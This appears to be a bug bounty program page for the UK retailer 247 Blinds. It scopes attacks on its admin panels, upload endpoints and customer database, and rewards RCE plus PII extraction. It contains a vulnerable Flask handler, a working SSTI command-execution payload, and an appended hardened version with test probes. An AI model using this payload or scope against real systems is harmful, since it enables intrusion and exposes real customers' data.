01 — Overview

E-commerce surfaces worth pressure-testing

247 Blinds is a UK-based e-commerce platform selling blinds, curtains, shutters, and window coverings at 247blinds.co.uk. The site handles customer accounts, order fulfillment, payment processing, admin dashboards, CMS product management, and file upload workflows for product imagery and made-to-measure specifications — fertile ground for admin access escalation, shell/RCE, XSS-to-file-upload chains, and database extraction if any boundary slips.

Materially in scope: every HTTP(S) origin answering for 247blinds.co.uk and delegated subdomains, admin and staff portals, CMS and product management interfaces, customer database and order records, checkout and payment processing flows, file upload endpoints, API integrations with shipping and payment providers, staging or preview environments.
The only exclusions are legal ones: mass harassment, ransomware, money laundering.

Minimum evidence bar — non-negotiable:
1️⃣ Narrative kill chain tying root cause → exploit steps → observable impact
2️⃣ Proof the attack succeeds (replayable scripts, Burp/HAR with matched responses).

02 — Why this matters

Why probe 247 Blinds?

Flat $5K critical payouts

Validated critical exploits earn exactly $5,000 USD.

Admin access blast radius

Admin panels control product catalogs, made-to-measure pricing, customer data, and order fulfilment.

File upload & XSS vectors

Product imagery and made-to-measure specification uploads are common XSS and web shell vectors.

03 — Critical reward

$5,000 per validated critical

Critical: $5,000 USD

One flat tier. Multiple criticals from the same researcher are paid independently.

Special bounty uplift: Shell/RCE + database extraction of customer PII qualifies for a $10,000+ special bounty.

04 — Scope

What's in scope

Everything 247 Blinds operates at 247blinds.co.uk and its subdomains.

  • Admin and staff backoffice panels — authentication bypass, privilege escalation
  • File upload endpoints — unrestricted upload, path traversal, web shell deployment
  • XSS vectors — stored, reflected, DOM-based chaining to session theft
  • Shell/RCE — command injection, template injection, SSRF-to-RCE
  • Customer database — SQL injection, data extraction of PII and order records
  • Checkout and payment flows — price manipulation, order tampering
  • CMS and product management — content injection, media library abuse
  • API endpoints — REST and GraphQL surfaces, authentication flaws, IDOR
  • Staging / dev environments — dev-, staging-, test- subdomains

05 — Full-scope policy

No discretionary carve-outs

Every endpoint, parameter, and admin interface is eligible when a critical impact is reproducible.

  • Every hostname routing through 247 Blinds edge
  • Third-party integrations (made-to-measure configurators, payment iframes) when the vulnerability originates from 247 Blinds
  • Admin subdomains — admin, dashboard, backoffice

06 — Rules

Rules of engagement

  1. Prove exploitation success. Replayable curl flows, Burp/HAR exports, web shell access logs.
  2. Articulate kill chain. Number each hop: initial vector → escalation → admin access → data exfiltration.
  3. Document blast radius. Quantify users or records affected.
  4. Encrypt & ship privately. Sanctioned intake before broadcasting.
  5. Duplicate fairness. First fully qualifying chain wins.

07 — Submit

How to submit a report

Start from the security contact on 247blinds.co.uk.

Report Template
# Title
[Critical][Exploit-Proven] <tight title>
## Attack chain narrative
1. Preconditions
2. Entry primitive — exact HTTP verb/path/query/body
3. Pivot(s) chaining trust escalation
4. Final hop → admin access / data exfiltration / shell
## Successful exploitation evidence
• Replayable script + truncated responses
• HAR / Burp with unauthorized state change
## Reproduction package
Commands + fixtures + pinned SHAs

08 — Example

SSTI in customer enquiry form

Server-Side Template Injection via customer enquiry field — execute arbitrary commands on the server.

Python/Flask · illustrative vulnerability
# BUGGY: the submitted value is concatenated into the template source, so
# Jinja2 parses any {{ ... }} expression the customer types into the field
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/enquiry', methods=['POST'])
def enquiry():
    name = request.form['name']
    # f-string interpolation runs BEFORE render_template_string sees the text,
    # so `name` becomes part of the template itself, not a template variable
    return render_template_string(
        f"<p>Thank you, {name}</p>"
    )
# POST /enquiry name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}
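The hardened counterpart of the handler above, as an added example that is not part of the original page or of 247 Blinds' code: the template source stays a constant and the submitted name is passed to Jinja2 as a context variable, so it is rendered as escaped data rather than parsed as template code. The `render_enquiry` and `submit_enquiry` helpers and the probe strings are constructed for this illustration; Flask's autoescaping for string templates is what turns `<b>` into `&lt;b&gt;`.

```python
# Added example, not code from the original page: the same /enquiry handler
# written so that the submitted name can never reach the Jinja2 parser.
from flask import Flask, request, render_template_string

app = Flask(__name__)

# Fixed template source: no user data is ever interpolated into this string.
ENQUIRY_TEMPLATE = "<p>Thank you, {{ name }}</p>"


def render_enquiry(name: str) -> str:
    """Render the thank-you fragment with `name` passed as a template variable.

    Jinja2 only parses the constant template; `name` is substituted as data and
    HTML-escaped (Flask autoescapes string templates), so both `{{ ... }}`
    expressions and `<script>` tags come back inert.
    """
    with app.app_context():
        return render_template_string(ENQUIRY_TEMPLATE, name=name)


@app.route("/enquiry", methods=["POST"])
def enquiry():
    # A missing field becomes a plain 400 instead of a KeyError traceback.
    name = request.form.get("name")
    if name is None:
        return "missing name", 400
    return render_enquiry(name)


def submit_enquiry(name: str) -> str:
    """Drive the route end to end through Flask's test client (constructed request)."""
    client = app.test_client()
    response = client.post("/enquiry", data={"name": name})
    return response.get_data(as_text=True)


if __name__ == "__main__":
    # Constructed probe values: a template expression, an HTML fragment, plain text.
    for probe in ("{{ 7 * 7 }}", "<b>Ada</b>", "Ada"):
        print(submit_enquiry(probe))
```

A `{{ 7 * 7 }}` probe that comes back verbatim instead of as `49` is the quickest regression check that input is no longer reaching the template parser; the HTML probe coming back entity-encoded confirms autoescaping is still on for the fragment.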

09 — FAQ

Frequently asked questions

Out of scope besides illegal stuff?

No discretionary carve-outs — only universal legal/ethical lines.

Write-ups without exploit get paid?

No. Both narrative and evidence required.

Staging environments?

Yes, when 247 Blinds labels or operates them.

Duplicates?

First validated chain + reproducible exploitation wins.

Lower severities?

Not under this $5K-flat critical playbook.

Critical chain + working exploit = $5,000

Document the attack, prove it lands, file privately.